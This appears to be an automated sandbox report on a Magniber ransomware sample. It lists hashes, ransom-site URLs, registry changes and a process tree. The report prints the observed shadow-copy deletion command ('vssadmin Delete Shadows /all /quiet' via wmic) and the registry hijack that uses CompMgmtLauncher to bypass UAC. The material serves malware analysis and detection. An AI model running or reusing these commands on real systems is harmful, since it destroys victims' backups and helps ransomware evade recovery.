Analysis
-
max time kernel
120s -
max time network
199s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
22/06/2021, 15:20
Static task
static1
Behavioral task
behavioral1
Sample
9.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
9.exe
Resource
win10v20210410
General
-
Target
9.exe
-
Size
21KB
-
MD5
6e4d7e63e05ef919d2b8724fbc3f3eeb
-
SHA1
97730b10da62c23ee6554625f5c24bf262aae261
-
SHA256
a5a2b6bfba012554d3c7e01c9df1173f995639caf31fdde8693e30ef501d26d7
-
SHA512
641c16245535d0e7eff19063830f8b8448d51fdefd6384a615495709b203c1522603292140b951cd220d1cd22e0f414f5c0e156633b2eb69f8ecf7fde8cdef86
Malware Config
Extracted
C:\Users\Admin\Desktop\readme.txt
magniber
http://0ce07ed8d4c45800ssdxwead.ndkeblzjnpqgpo5o.onion/ssdxwead
http://0ce07ed8d4c45800ssdxwead.lieedge.casa/ssdxwead
http://0ce07ed8d4c45800ssdxwead.wonride.site/ssdxwead
http://0ce07ed8d4c45800ssdxwead.lognear.xyz/ssdxwead
http://0ce07ed8d4c45800ssdxwead.bejoin.space/ssdxwead
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 8 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 612 824 cmd.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1308 824 cmd.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1804 824 cmd.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 292 824 cmd.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1644 824 vssadmin.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1684 824 vssadmin.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 764 824 vssadmin.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1804 824 vssadmin.exe 45 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\BlockRevoke.crw => C:\Users\Admin\Pictures\BlockRevoke.crw.ssdxwead taskhost.exe File renamed C:\Users\Admin\Pictures\ApproveExport.tiff => C:\Users\Admin\Pictures\ApproveExport.tiff.ssdxwead taskhost.exe File renamed C:\Users\Admin\Pictures\UpdateStart.tif => C:\Users\Admin\Pictures\UpdateStart.tif.ssdxwead taskhost.exe File opened for modification C:\Users\Admin\Pictures\WatchConvert.tiff taskhost.exe File renamed C:\Users\Admin\Pictures\WatchConvert.tiff => C:\Users\Admin\Pictures\WatchConvert.tiff.ssdxwead taskhost.exe File renamed C:\Users\Admin\Pictures\BackupClose.crw => C:\Users\Admin\Pictures\BackupClose.crw.ssdxwead taskhost.exe File renamed C:\Users\Admin\Pictures\GetSkip.raw => C:\Users\Admin\Pictures\GetSkip.raw.ssdxwead taskhost.exe File opened for modification C:\Users\Admin\Pictures\ApproveExport.tiff taskhost.exe File renamed C:\Users\Admin\Pictures\EnableReset.tif => C:\Users\Admin\Pictures\EnableReset.tif.ssdxwead taskhost.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1988 set thread context of 1120 1988 9.exe 16 PID 1988 set thread context of 1180 1988 9.exe 14 PID 1988 set thread context of 1224 1988 9.exe 13 -
Interacts with shadow copies 2 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1644 vssadmin.exe 1684 vssadmin.exe 764 vssadmin.exe 1804 vssadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{DC89EC11-D37E-11EB-896A-766459B397AD} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 108debb48b67d701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000529101d5c9814b4eb0f580b37542e4500000000002000000000010660000000100002000000044d644a3bd91bdfa4d09d5ad32dc8daa72b2b8dd08de51f78aea742ff836923f000000000e80000000020000200000007e4b40be52686bbe81a3a8ccaf382cebec57a45f6253e53795f8178cee59044c900000009b86a795b5ddcfed7fe2f136ee3e3fb68f11448742773af77bf27e6dbeed38eb6fa20c03987bcc8b3e26766dd4e8cd4bbf8fc8e456b420167cc5baf0c3f8d8a6d6982005fa7496d0baea7ceb3b8decb1ab163b8eaa1ba4a7fdca8dad6ac4a2f46d7a3dc69f211c4f9a52f0d9bfede44b52cec6331fc169c51edd268491f1abeaf3bd34fa44179de3af3cf53aaf4c7e0c400000003fe103cb078ab4086f2beac524a2ac45d5c813d14d8ca1be0b3d7d3e6a00f4d6b0f730a326a0141ae02bac2c1d2568c71d68eab41307778bb1c81fad55f3daa2 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000529101d5c9814b4eb0f580b37542e450000000000200000000001066000000010000200000000fbca0580c2f13f4177495312dcbd9813df828af0054ab6d0e2b07843a716e8d000000000e80000000020000200000005d48cf0286f3eb5754ef00fe8443bc9738fe115c86687728fba29eb2211445092000000099fb14f8df85ed5e2dd89c0def6e9eb99f91152d167169bb30a5048d7f6c1fe440000000a1f6fd091f3ea6b0ba423bae8c943d0a8973533eb449a36a7a9c2d114eabdc5277b8b9f17501bd0dfe528670a5a9e9e667f325f0535ebd54e08d7a1b780e1b9c iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "331147714" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command Dwm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" 9.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Dwm.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command 9.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1372 notepad.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1988 9.exe 1988 9.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1988 9.exe 1988 9.exe 1988 9.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1224 Explorer.EXE Token: SeShutdownPrivilege 1224 Explorer.EXE Token: SeShutdownPrivilege 1224 Explorer.EXE Token: SeIncreaseQuotaPrivilege 1848 WMIC.exe Token: SeSecurityPrivilege 1848 WMIC.exe Token: SeTakeOwnershipPrivilege 1848 WMIC.exe Token: SeLoadDriverPrivilege 1848 WMIC.exe Token: SeSystemProfilePrivilege 1848 WMIC.exe Token: SeSystemtimePrivilege 1848 WMIC.exe Token: SeProfSingleProcessPrivilege 1848 WMIC.exe Token: SeIncBasePriorityPrivilege 1848 WMIC.exe Token: SeCreatePagefilePrivilege 1848 WMIC.exe Token: SeBackupPrivilege 1848 WMIC.exe Token: SeRestorePrivilege 1848 WMIC.exe Token: SeShutdownPrivilege 1848 WMIC.exe Token: SeDebugPrivilege 1848 WMIC.exe Token: SeSystemEnvironmentPrivilege 1848 WMIC.exe Token: SeRemoteShutdownPrivilege 1848 WMIC.exe Token: SeUndockPrivilege 1848 WMIC.exe Token: SeManageVolumePrivilege 1848 WMIC.exe Token: 33 1848 WMIC.exe Token: 34 1848 WMIC.exe Token: 35 1848 WMIC.exe Token: SeIncreaseQuotaPrivilege 1648 conhost.exe Token: SeSecurityPrivilege 1648 conhost.exe Token: SeTakeOwnershipPrivilege 1648 conhost.exe Token: SeLoadDriverPrivilege 1648 conhost.exe Token: SeSystemProfilePrivilege 1648 conhost.exe Token: SeSystemtimePrivilege 1648 conhost.exe Token: SeProfSingleProcessPrivilege 1648 conhost.exe Token: SeIncBasePriorityPrivilege 1648 conhost.exe Token: SeCreatePagefilePrivilege 1648 conhost.exe Token: SeBackupPrivilege 1648 conhost.exe Token: SeRestorePrivilege 1648 conhost.exe Token: SeShutdownPrivilege 1648 conhost.exe Token: SeDebugPrivilege 1648 conhost.exe Token: SeSystemEnvironmentPrivilege 1648 conhost.exe Token: SeRemoteShutdownPrivilege 1648 conhost.exe Token: SeUndockPrivilege 1648 conhost.exe Token: SeManageVolumePrivilege 1648 conhost.exe Token: 33 1648 conhost.exe Token: 34 1648 conhost.exe Token: 35 1648 conhost.exe Token: SeIncreaseQuotaPrivilege 848 WMIC.exe Token: SeSecurityPrivilege 848 WMIC.exe Token: SeTakeOwnershipPrivilege 848 WMIC.exe Token: SeLoadDriverPrivilege 848 WMIC.exe Token: SeSystemProfilePrivilege 848 WMIC.exe Token: SeSystemtimePrivilege 848 WMIC.exe Token: SeProfSingleProcessPrivilege 848 WMIC.exe Token: SeIncBasePriorityPrivilege 848 WMIC.exe Token: SeCreatePagefilePrivilege 848 WMIC.exe Token: SeBackupPrivilege 848 WMIC.exe Token: SeRestorePrivilege 848 WMIC.exe Token: SeShutdownPrivilege 848 WMIC.exe Token: SeDebugPrivilege 848 WMIC.exe Token: SeSystemEnvironmentPrivilege 848 WMIC.exe Token: SeRemoteShutdownPrivilege 848 WMIC.exe Token: SeUndockPrivilege 848 WMIC.exe Token: SeManageVolumePrivilege 848 WMIC.exe Token: 33 848 WMIC.exe Token: 34 848 WMIC.exe Token: 35 848 WMIC.exe Token: SeIncreaseQuotaPrivilege 1304 WMIC.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 1224 Explorer.EXE 1788 iexplore.exe 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE -
Suspicious use of SendNotifyMessage 8 IoCs
pid Process 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1788 iexplore.exe 1788 iexplore.exe 1052 IEXPLORE.EXE 1052 IEXPLORE.EXE 1052 IEXPLORE.EXE 1052 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 61 IoCs
description pid Process procid_target PID 1120 wrote to memory of 1372 1120 taskhost.exe 29 PID 1120 wrote to memory of 1372 1120 taskhost.exe 29 PID 1120 wrote to memory of 1372 1120 taskhost.exe 29 PID 1120 wrote to memory of 692 1120 taskhost.exe 31 PID 1120 wrote to memory of 692 1120 taskhost.exe 31 PID 1120 wrote to memory of 692 1120 taskhost.exe 31 PID 1120 wrote to memory of 1608 1120 taskhost.exe 32 PID 1120 wrote to memory of 1608 1120 taskhost.exe 32 PID 1120 wrote to memory of 1608 1120 taskhost.exe 32 PID 1608 wrote to memory of 1848 1608 cmd.exe 36 PID 1608 wrote to memory of 1848 1608 cmd.exe 36 PID 1608 wrote to memory of 1848 1608 cmd.exe 36 PID 1180 wrote to memory of 1344 1180 Dwm.exe 35 PID 1180 wrote to memory of 1344 1180 Dwm.exe 35 PID 1180 wrote to memory of 1344 1180 Dwm.exe 35 PID 1224 wrote to memory of 1844 1224 Explorer.EXE 37 PID 1224 wrote to memory of 1844 1224 Explorer.EXE 37 PID 1224 wrote to memory of 1844 1224 Explorer.EXE 37 PID 1344 wrote to memory of 1648 1344 cmd.exe 61 PID 1344 wrote to memory of 1648 1344 cmd.exe 61 PID 1344 wrote to memory of 1648 1344 cmd.exe 61 PID 1844 wrote to memory of 848 1844 cmd.exe 41 PID 1844 wrote to memory of 848 1844 cmd.exe 41 PID 1844 wrote to memory of 848 1844 cmd.exe 41 PID 1988 wrote to memory of 1792 1988 9.exe 42 PID 1988 wrote to memory of 1792 1988 9.exe 42 PID 1988 wrote to memory of 1792 1988 9.exe 42 PID 1792 wrote to memory of 1304 1792 cmd.exe 44 PID 1792 wrote to memory of 1304 1792 cmd.exe 44 PID 1792 wrote to memory of 1304 1792 cmd.exe 44 PID 292 wrote to memory of 676 292 cmd.exe 57 PID 292 wrote to memory of 676 292 cmd.exe 57 PID 292 wrote to memory of 676 292 cmd.exe 57 PID 612 wrote to memory of 1732 612 cmd.exe 56 PID 612 wrote to memory of 1732 612 cmd.exe 56 PID 612 wrote to memory of 1732 612 cmd.exe 56 PID 1308 wrote to memory of 1600 1308 cmd.exe 67 PID 1308 wrote to memory of 1600 1308 cmd.exe 67 PID 1308 wrote to memory of 1600 1308 cmd.exe 67 PID 1804 wrote to memory of 1556 1804 vssadmin.exe 54 PID 1804 wrote to memory of 1556 1804 vssadmin.exe 54 PID 1804 wrote to memory of 1556 1804 vssadmin.exe 54 PID 692 wrote to memory of 1788 692 cmd.exe 58 PID 692 wrote to memory of 1788 692 cmd.exe 58 PID 692 wrote to memory of 1788 692 cmd.exe 58 PID 1556 wrote to memory of 1060 1556 CompMgmtLauncher.exe 62 PID 1556 wrote to memory of 1060 1556 CompMgmtLauncher.exe 62 PID 1556 wrote to memory of 1060 1556 CompMgmtLauncher.exe 62 PID 676 wrote to memory of 1084 676 CompMgmtLauncher.exe 60 PID 676 wrote to memory of 1084 676 CompMgmtLauncher.exe 60 PID 676 wrote to memory of 1084 676 CompMgmtLauncher.exe 60 PID 1600 wrote to memory of 304 1600 DllHost.exe 59 PID 1600 wrote to memory of 304 1600 DllHost.exe 59 PID 1600 wrote to memory of 304 1600 DllHost.exe 59 PID 1732 wrote to memory of 1652 1732 CompMgmtLauncher.exe 65 PID 1732 wrote to memory of 1652 1732 CompMgmtLauncher.exe 65 PID 1732 wrote to memory of 1652 1732 CompMgmtLauncher.exe 65 PID 1788 wrote to memory of 1052 1788 iexplore.exe 76 PID 1788 wrote to memory of 1052 1788 iexplore.exe 76 PID 1788 wrote to memory of 1052 1788 iexplore.exe 76 PID 1788 wrote to memory of 1052 1788 iexplore.exe 76
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Users\Admin\AppData\Local\Temp\9.exe"C:\Users\Admin\AppData\Local\Temp\9.exe"2⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1304
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:848
-
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵PID:1648
-
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1372
-
-
C:\Windows\system32\cmd.execmd /c "start http://0ce07ed8d4c45800ssdxwead.lieedge.casa/ssdxwead^&1^&39881967^&72^&315^&12"2⤵
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://0ce07ed8d4c45800ssdxwead.lieedge.casa/ssdxwead&1&39881967&72&315&123⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1788 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1052
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1848
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:612 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1652
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵PID:1600
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:304
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
PID:1804 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1060
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:292 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1084
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2100226177-423966974-3799054542608157131163108094-2108732498-15245291691214588763"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1648
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Suspicious use of WriteProcessMemory
PID:1600
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1644
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1684
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:764
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
- Suspicious use of WriteProcessMemory
PID:1804
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:960